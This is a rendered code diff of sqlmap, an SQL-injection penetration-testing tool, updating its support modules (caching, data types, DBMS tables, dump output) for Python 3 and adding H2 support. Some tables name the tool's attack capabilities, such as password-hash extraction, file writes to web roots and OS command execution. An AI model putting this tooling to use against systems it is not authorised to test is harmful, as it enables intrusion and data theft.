||||||
errMsg += "to a temporary file ('%s'). Please " % ex.message
|
errMsg += "to a temporary file ('%s'). Please " % ex.message
|
||||||
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||||
errMsg += "try to set environment variable 'TEMP' to a location "
|
errMsg += "try to set environment variable 'TEMP' to a location "
|
||||||
errMsg += "writeable by the current user"
|
errMsg += "writeable by the current user"
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def _checkcache(self, index):
|
def _checkcache(self, index):
|
||||||
if (self.cache and self.cache.index != index and self.cache.dirty):
|
if (self.cache and self.cache.index != index and self.cache.dirty):
|
||||||
@@ -122,11 +125,11 @@ class BigArray(list):
|
|||||||
if not (self.cache and self.cache.index == index):
|
if not (self.cache and self.cache.index == index):
|
||||||
try:
|
try:
|
||||||
with open(self.chunks[index], "rb") as f:
|
with open(self.chunks[index], "rb") as f:
|
||||||
self.cache = Cache(index, pickle.loads(zlib.decompress(f.read())), False)
|
self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False)
|
||||||
except IOError, ex:
|
except Exception as ex:
|
||||||
errMsg = "exception occurred while retrieving data "
|
errMsg = "exception occurred while retrieving data "
|
||||||
errMsg += "from a temporary file ('%s')" % ex.message
|
errMsg += "from a temporary file ('%s')" % ex.message
|
||||||
raise SqlmapSystemException, errMsg
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def __getstate__(self):
|
def __getstate__(self):
|
||||||
return self.chunks, self.filenames
|
return self.chunks, self.filenames
|
||||||
@@ -136,21 +139,16 @@ class BigArray(list):
|
|||||||
self.chunks, self.filenames = state
|
self.chunks, self.filenames = state
|
||||||
|
|
||||||
def __getslice__(self, i, j):
|
def __getslice__(self, i, j):
|
||||||
retval = BigArray()
|
|
||||||
|
|
||||||
i = max(0, len(self) + i if i < 0 else i)
|
i = max(0, len(self) + i if i < 0 else i)
|
||||||
j = min(len(self), len(self) + j if j < 0 else j)
|
j = min(len(self), len(self) + j if j < 0 else j)
|
||||||
|
|
||||||
for _ in xrange(i, j):
|
return BigArray(self[_] for _ in xrange(i, j))
|
||||||
retval.append(self[_])
|
|
||||||
|
|
||||||
return retval
|
|
||||||
|
|
||||||
def __getitem__(self, y):
|
def __getitem__(self, y):
|
||||||
if y < 0:
|
if y < 0:
|
||||||
y += len(self)
|
y += len(self)
|
||||||
|
|
||||||
index = y / self.chunk_length
|
index = y // self.chunk_length
|
||||||
offset = y % self.chunk_length
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
||||||
|
|
||||||
@@ -161,7 +159,7 @@ class BigArray(list):
|
|||||||
return self.cache.data[offset]
|
return self.cache.data[offset]
|
||||||
|
|
||||||
def __setitem__(self, y, value):
|
def __setitem__(self, y, value):
|
||||||
index = y / self.chunk_length
|
index = y // self.chunk_length
|
||||||
offset = y % self.chunk_length
|
offset = y % self.chunk_length
|
||||||
chunk = self.chunks[index]
|
chunk = self.chunks[index]
|
||||||
|
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -80,7 +80,7 @@ def base64unpickle(value, unsafe=False):
|
|||||||
if len(self.stack) > 1:
|
if len(self.stack) > 1:
|
||||||
func = self.stack[-2]
|
func = self.stack[-2]
|
||||||
if func not in PICKLE_REDUCE_WHITELIST:
|
if func not in PICKLE_REDUCE_WHITELIST:
|
||||||
raise Exception, "abusing reduce() is bad, Mkay!"
|
raise Exception("abusing reduce() is bad, Mkay!")
|
||||||
self.load_reduce()
|
self.load_reduce()
|
||||||
|
|
||||||
def loads(str):
|
def loads(str):
|
||||||
@@ -174,7 +174,7 @@ def htmlunescape(value):
|
|||||||
pass
|
pass
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def singleTimeWarnMessage(message): # Cross-linked function
|
def singleTimeWarnMessage(message): # Cross-referenced function
|
||||||
sys.stdout.write(message)
|
sys.stdout.write(message)
|
||||||
sys.stdout.write("\n")
|
sys.stdout.write("\n")
|
||||||
sys.stdout.flush()
|
sys.stdout.flush()
|
||||||
@@ -193,7 +193,7 @@ def stdoutencode(data):
|
|||||||
warnMsg = "cannot properly display Unicode characters "
|
warnMsg = "cannot properly display Unicode characters "
|
||||||
warnMsg += "inside Windows OS command prompt "
|
warnMsg += "inside Windows OS command prompt "
|
||||||
warnMsg += "(http://bugs.python.org/issue1602). All "
|
warnMsg += "(http://bugs.python.org/issue1602). All "
|
||||||
warnMsg += "unhandled occurances will result in "
|
warnMsg += "unhandled occurrences will result in "
|
||||||
warnMsg += "replacement with '?' character. Please, find "
|
warnMsg += "replacement with '?' character. Please, find "
|
||||||
warnMsg += "proper character representation inside "
|
warnMsg += "proper character representation inside "
|
||||||
warnMsg += "corresponding output files. "
|
warnMsg += "corresponding output files. "
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,13 +1,15 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import copy
|
import copy
|
||||||
import types
|
import types
|
||||||
|
|
||||||
|
from thirdparty.odict.odict import OrderedDict
|
||||||
|
|
||||||
class AttribDict(dict):
|
class AttribDict(dict):
|
||||||
"""
|
"""
|
||||||
This class defines the sqlmap object, inheriting from Python data
|
This class defines the sqlmap object, inheriting from Python data
|
||||||
@@ -104,3 +106,40 @@ class InjectionDict(AttribDict):
|
|||||||
self.dbms = None
|
self.dbms = None
|
||||||
self.dbms_version = None
|
self.dbms_version = None
|
||||||
self.os = None
|
self.os = None
|
||||||
|
|
||||||
|
# Reference: https://www.kunxi.org/2014/05/lru-cache-in-python
|
||||||
|
class LRUDict(object):
|
||||||
|
def __init__(self, capacity):
|
||||||
|
self.capacity = capacity
|
||||||
|
self.cache = OrderedDict()
|
||||||
|
|
||||||
|
def __len__(self):
|
||||||
|
return len(self.cache)
|
||||||
|
|
||||||
|
def __contains__(self, key):
|
||||||
|
return key in self.cache
|
||||||
|
|
||||||
|
def __getitem__(self, key):
|
||||||
|
try:
|
||||||
|
value = self.cache.pop(key)
|
||||||
|
self.cache[key] = value
|
||||||
|
return value
|
||||||
|
except KeyError:
|
||||||
|
return -1
|
||||||
|
|
||||||
|
def get(self, key):
|
||||||
|
return self.__getitem__(self, key)
|
||||||
|
|
||||||
|
def __setitem__(self, key, value):
|
||||||
|
try:
|
||||||
|
self.cache.pop(key)
|
||||||
|
except KeyError:
|
||||||
|
if len(self.cache) >= self.capacity:
|
||||||
|
self.cache.popitem(last=False)
|
||||||
|
self.cache[key] = value
|
||||||
|
|
||||||
|
def set(self, key, value):
|
||||||
|
self.__setitem__(key, value)
|
||||||
|
|
||||||
|
def keys(self):
|
||||||
|
return self.cache.keys()
|
||||||
|
|||||||
@@ -1,27 +1,54 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def cachedmethod(f, cache={}):
|
import functools
|
||||||
|
import hashlib
|
||||||
|
import threading
|
||||||
|
|
||||||
|
from lib.core.settings import MAX_CACHE_ITEMS
|
||||||
|
from lib.core.datatype import LRUDict
|
||||||
|
from lib.core.threads import getCurrentThreadData
|
||||||
|
|
||||||
|
_lock = threading.Lock()
|
||||||
|
|
||||||
|
def cachedmethod(f, cache=LRUDict(capacity=MAX_CACHE_ITEMS)):
|
||||||
"""
|
"""
|
||||||
Method with a cached content
|
Method with a cached content
|
||||||
|
|
||||||
Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
|
Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@functools.wraps(f)
|
||||||
def _(*args, **kwargs):
|
def _(*args, **kwargs):
|
||||||
try:
|
with _lock:
|
||||||
key = hash((f, tuple(args), frozenset(kwargs.items())))
|
key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs))).hexdigest(), 16) & 0x7fffffffffffffff
|
||||||
if key not in cache:
|
|
||||||
cache[key] = f(*args, **kwargs)
|
|
||||||
except:
|
|
||||||
key = hash("".join(str(_) for _ in (f, args, kwargs)))
|
|
||||||
if key not in cache:
|
if key not in cache:
|
||||||
cache[key] = f(*args, **kwargs)
|
cache[key] = f(*args, **kwargs)
|
||||||
|
|
||||||
return cache[key]
|
return cache[key]
|
||||||
|
|
||||||
|
return _
|
||||||
|
|
||||||
|
def stackedmethod(f):
|
||||||
|
"""
|
||||||
|
Method using pushValue/popValue functions (fallback function for stack realignment)
|
||||||
|
"""
|
||||||
|
|
||||||
|
@functools.wraps(f)
|
||||||
|
def _(*args, **kwargs):
|
||||||
|
threadData = getCurrentThreadData()
|
||||||
|
originalLevel = len(threadData.valueStack)
|
||||||
|
|
||||||
|
try:
|
||||||
|
result = f(*args, **kwargs)
|
||||||
|
finally:
|
||||||
|
if len(threadData.valueStack) > originalLevel:
|
||||||
|
threadData.valueStack = threadData.valueStack[:originalLevel]
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
return _
|
return _
|
||||||
|
|||||||
@@ -1,27 +1,27 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.core.datatype import AttribDict
|
from lib.core.datatype import AttribDict
|
||||||
|
|
||||||
_defaults = {
|
_defaults = {
|
||||||
"csvDel": ',',
|
"csvDel": ',',
|
||||||
"timeSec": 5,
|
"timeSec": 5,
|
||||||
"googlePage": 1,
|
"googlePage": 1,
|
||||||
"verbose": 1,
|
"verbose": 1,
|
||||||
"delay": 0,
|
"delay": 0,
|
||||||
"timeout": 30,
|
"timeout": 30,
|
||||||
"retries": 3,
|
"retries": 3,
|
||||||
"saFreq": 0,
|
"saFreq": 0,
|
||||||
"threads": 1,
|
"threads": 1,
|
||||||
"level": 1,
|
"level": 1,
|
||||||
"risk": 1,
|
"risk": 1,
|
||||||
"dumpFormat": "CSV",
|
"dumpFormat": "CSV",
|
||||||
"tech": "BEUSTQ",
|
"tech": "BEUSTQ",
|
||||||
"torType": "SOCKS5",
|
"torType": "SOCKS5",
|
||||||
}
|
}
|
||||||
|
|
||||||
defaults = AttribDict(_defaults)
|
defaults = AttribDict(_defaults)
|
||||||
|
|||||||
@@ -1,10 +1,11 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from lib.core.enums import CONTENT_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
from lib.core.enums import POST_HINT
|
from lib.core.enums import POST_HINT
|
||||||
@@ -21,6 +22,7 @@ from lib.core.settings import MAXDB_ALIASES
|
|||||||
from lib.core.settings import SYBASE_ALIASES
|
from lib.core.settings import SYBASE_ALIASES
|
||||||
from lib.core.settings import DB2_ALIASES
|
from lib.core.settings import DB2_ALIASES
|
||||||
from lib.core.settings import HSQLDB_ALIASES
|
from lib.core.settings import HSQLDB_ALIASES
|
||||||
|
from lib.core.settings import H2_ALIASES
|
||||||
from lib.core.settings import INFORMIX_ALIASES
|
from lib.core.settings import INFORMIX_ALIASES
|
||||||
|
|
||||||
FIREBIRD_TYPES = {
|
FIREBIRD_TYPES = {
|
||||||
@@ -184,16 +186,17 @@ DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}
|
|||||||
|
|
||||||
DBMS_DICT = {
|
DBMS_DICT = {
|
||||||
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"),
|
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"),
|
||||||
DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
|
DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/PyMySQL/PyMySQL", "mysql"),
|
||||||
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
|
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
|
||||||
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
|
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "https://oracle.github.io/python-cx_Oracle/", "oracle"),
|
||||||
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
|
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "https://docs.python.org/2/library/sqlite3.html", "sqlite"),
|
||||||
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"),
|
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"),
|
||||||
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
|
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
|
||||||
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
||||||
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"),
|
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"),
|
||||||
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
|
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
|
||||||
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
|
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
|
||||||
|
DBMS.H2: (H2_ALIASES, None, None, None),
|
||||||
DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
|
DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -208,54 +211,64 @@ FROM_DUMMY_TABLE = {
|
|||||||
}
|
}
|
||||||
|
|
||||||
SQL_STATEMENTS = {
|
SQL_STATEMENTS = {
|
||||||
"SQL SELECT statement": (
|
"SQL SELECT statement": (
|
||||||
"select ",
|
"select ",
|
||||||
"show ",
|
"show ",
|
||||||
" top ",
|
" top ",
|
||||||
" distinct ",
|
" distinct ",
|
||||||
" from ",
|
" from ",
|
||||||
" from dual",
|
" from dual",
|
||||||
" where ",
|
" where ",
|
||||||
" group by ",
|
" group by ",
|
||||||
" order by ",
|
" order by ",
|
||||||
" having ",
|
" having ",
|
||||||
" limit ",
|
" limit ",
|
||||||
" offset ",
|
" offset ",
|
||||||
" union all ",
|
" union all ",
|
||||||
" rownum as ",
|
" rownum as ",
|
||||||
"(case ", ),
|
"(case ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data definition": (
|
"SQL data definition": (
|
||||||
"create ",
|
"create ",
|
||||||
"declare ",
|
"declare ",
|
||||||
"drop ",
|
"drop ",
|
||||||
"truncate ",
|
"truncate ",
|
||||||
"alter ", ),
|
"alter ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data manipulation": (
|
"SQL data manipulation": (
|
||||||
"bulk ",
|
"bulk ",
|
||||||
"insert ",
|
"insert ",
|
||||||
"update ",
|
"update ",
|
||||||
"delete ",
|
"delete ",
|
||||||
"merge ",
|
"merge ",
|
||||||
"load ", ),
|
"load ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data control": (
|
"SQL data control": (
|
||||||
"grant ",
|
"grant ",
|
||||||
"revoke ", ),
|
"revoke ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data execution": (
|
"SQL data execution": (
|
||||||
"exec ",
|
"exec ",
|
||||||
"execute ",
|
"execute ",
|
||||||
"values ",
|
"values ",
|
||||||
"call ", ),
|
"call ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL transaction": (
|
"SQL transaction": (
|
||||||
"start transaction ",
|
"start transaction ",
|
||||||
"begin work ",
|
"begin work ",
|
||||||
"begin transaction ",
|
"begin transaction ",
|
||||||
"commit ",
|
"commit ",
|
||||||
"rollback ", ),
|
"rollback ",
|
||||||
|
),
|
||||||
|
|
||||||
|
"SQL administration": (
|
||||||
|
"set ",
|
||||||
|
),
|
||||||
}
|
}
|
||||||
|
|
||||||
POST_HINT_CONTENT_TYPES = {
|
POST_HINT_CONTENT_TYPES = {
|
||||||
@@ -273,6 +286,8 @@ DEPRECATED_OPTIONS = {
|
|||||||
"--binary": "use '--binary-fields' instead",
|
"--binary": "use '--binary-fields' instead",
|
||||||
"--auth-private": "use '--auth-file' instead",
|
"--auth-private": "use '--auth-file' instead",
|
||||||
"--ignore-401": "use '--ignore-code' instead",
|
"--ignore-401": "use '--ignore-code' instead",
|
||||||
|
"--second-order": "use '--second-url' instead",
|
||||||
|
"--purge-output": "use '--purge' instead",
|
||||||
"--check-payload": None,
|
"--check-payload": None,
|
||||||
"--check-waf": None,
|
"--check-waf": None,
|
||||||
"--pickled-options": "use '--api -c ...' instead",
|
"--pickled-options": "use '--api -c ...' instead",
|
||||||
@@ -287,3 +302,31 @@ DEFAULT_DOC_ROOTS = {
|
|||||||
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
|
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
|
||||||
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
||||||
}
|
}
|
||||||
|
|
||||||
|
PART_RUN_CONTENT_TYPES = {
|
||||||
|
"checkDbms": CONTENT_TYPE.TECHNIQUES,
|
||||||
|
"getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
|
||||||
|
"getBanner": CONTENT_TYPE.BANNER,
|
||||||
|
"getCurrentUser": CONTENT_TYPE.CURRENT_USER,
|
||||||
|
"getCurrentDb": CONTENT_TYPE.CURRENT_DB,
|
||||||
|
"getHostname": CONTENT_TYPE.HOSTNAME,
|
||||||
|
"isDba": CONTENT_TYPE.IS_DBA,
|
||||||
|
"getUsers": CONTENT_TYPE.USERS,
|
||||||
|
"getPasswordHashes": CONTENT_TYPE.PASSWORDS,
|
||||||
|
"getPrivileges": CONTENT_TYPE.PRIVILEGES,
|
||||||
|
"getRoles": CONTENT_TYPE.ROLES,
|
||||||
|
"getDbs": CONTENT_TYPE.DBS,
|
||||||
|
"getTables": CONTENT_TYPE.TABLES,
|
||||||
|
"getColumns": CONTENT_TYPE.COLUMNS,
|
||||||
|
"getSchema": CONTENT_TYPE.SCHEMA,
|
||||||
|
"getCount": CONTENT_TYPE.COUNT,
|
||||||
|
"dumpTable": CONTENT_TYPE.DUMP_TABLE,
|
||||||
|
"search": CONTENT_TYPE.SEARCH,
|
||||||
|
"sqlQuery": CONTENT_TYPE.SQL_QUERY,
|
||||||
|
"tableExists": CONTENT_TYPE.COMMON_TABLES,
|
||||||
|
"columnExists": CONTENT_TYPE.COMMON_COLUMNS,
|
||||||
|
"readFile": CONTENT_TYPE.FILE_READ,
|
||||||
|
"writeFile": CONTENT_TYPE.FILE_WRITE,
|
||||||
|
"osCmd": CONTENT_TYPE.OS_CMD,
|
||||||
|
"regRead": CONTENT_TYPE.REG_READ
|
||||||
|
}
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -20,6 +20,7 @@ from lib.core.common import dataToStdout
|
|||||||
from lib.core.common import getSafeExString
|
from lib.core.common import getSafeExString
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import isListLike
|
from lib.core.common import isListLike
|
||||||
|
from lib.core.common import isMultiThreadMode
|
||||||
from lib.core.common import normalizeUnicode
|
from lib.core.common import normalizeUnicode
|
||||||
from lib.core.common import openFile
|
from lib.core.common import openFile
|
||||||
from lib.core.common import prioritySortColumns
|
from lib.core.common import prioritySortColumns
|
||||||
@@ -46,6 +47,8 @@ from lib.core.settings import METADB_SUFFIX
|
|||||||
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
|
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
|
||||||
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
|
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT
|
||||||
|
from lib.core.settings import VERSION_STRING
|
||||||
from lib.core.settings import WINDOWS_RESERVED_NAMES
|
from lib.core.settings import WINDOWS_RESERVED_NAMES
|
||||||
from thirdparty.magic import magic
|
from thirdparty.magic import magic
|
||||||
|
|
||||||
@@ -72,16 +75,17 @@ class Dump(object):
|
|||||||
if console:
|
if console:
|
||||||
dataToStdout(text)
|
dataToStdout(text)
|
||||||
|
|
||||||
if kb.get("multiThreadMode"):
|
multiThreadMode = isMultiThreadMode()
|
||||||
|
if multiThreadMode:
|
||||||
self._lock.acquire()
|
self._lock.acquire()
|
||||||
|
|
||||||
try:
|
try:
|
||||||
self._outputFP.write(text)
|
self._outputFP.write(text)
|
||||||
except IOError, ex:
|
except IOError as ex:
|
||||||
errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex)
|
errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex)
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if kb.get("multiThreadMode"):
|
if multiThreadMode:
|
||||||
self._lock.release()
|
self._lock.release()
|
||||||
|
|
||||||
kb.dataOutputFlag = True
|
kb.dataOutputFlag = True
|
||||||
@@ -97,7 +101,7 @@ class Dump(object):
|
|||||||
self._outputFile = os.path.join(conf.outputPath, "log")
|
self._outputFile = os.path.join(conf.outputPath, "log")
|
||||||
try:
|
try:
|
||||||
self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
|
self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
|
||||||
except IOError, ex:
|
except IOError as ex:
|
||||||
errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex)
|
errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex)
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
@@ -108,8 +112,6 @@ class Dump(object):
|
|||||||
self._write(data, content_type=content_type)
|
self._write(data, content_type=content_type)
|
||||||
|
|
||||||
def string(self, header, data, content_type=None, sort=True):
|
def string(self, header, data, content_type=None, sort=True):
|
||||||
kb.stickyLevel = None
|
|
||||||
|
|
||||||
if conf.api:
|
if conf.api:
|
||||||
self._write(data, content_type=content_type)
|
self._write(data, content_type=content_type)
|
||||||
return
|
return
|
||||||
@@ -140,7 +142,7 @@ class Dump(object):
|
|||||||
try:
|
try:
|
||||||
elements = set(elements)
|
elements = set(elements)
|
||||||
elements = list(elements)
|
elements = list(elements)
|
||||||
elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
elements.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
@@ -169,7 +171,7 @@ class Dump(object):
|
|||||||
def currentDb(self, data):
|
def currentDb(self, data):
|
||||||
if Backend.isDbms(DBMS.MAXDB):
|
if Backend.isDbms(DBMS.MAXDB):
|
||||||
self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2):
|
||||||
self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
||||||
else:
|
else:
|
||||||
self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
|
self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
|
||||||
@@ -191,7 +193,7 @@ class Dump(object):
|
|||||||
userSettings = userSettings[0]
|
userSettings = userSettings[0]
|
||||||
|
|
||||||
users = userSettings.keys()
|
users = userSettings.keys()
|
||||||
users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
users.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
|
||||||
|
|
||||||
if conf.api:
|
if conf.api:
|
||||||
self._write(userSettings, content_type=content_type)
|
self._write(userSettings, content_type=content_type)
|
||||||
@@ -285,7 +287,7 @@ class Dump(object):
|
|||||||
colType = None
|
colType = None
|
||||||
|
|
||||||
colList = columns.keys()
|
colList = columns.keys()
|
||||||
colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
colList.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
|
||||||
|
|
||||||
for column in colList:
|
for column in colList:
|
||||||
colType = columns[column]
|
colType = columns[column]
|
||||||
@@ -377,7 +379,7 @@ class Dump(object):
|
|||||||
if count is None:
|
if count is None:
|
||||||
count = "Unknown"
|
count = "Unknown"
|
||||||
|
|
||||||
tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
tables.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
|
||||||
|
|
||||||
for table in tables:
|
for table in tables:
|
||||||
blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table)))
|
blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table)))
|
||||||
@@ -414,20 +416,20 @@ class Dump(object):
|
|||||||
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
||||||
if not os.path.isdir(dumpDbPath):
|
if not os.path.isdir(dumpDbPath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(dumpDbPath, 0755)
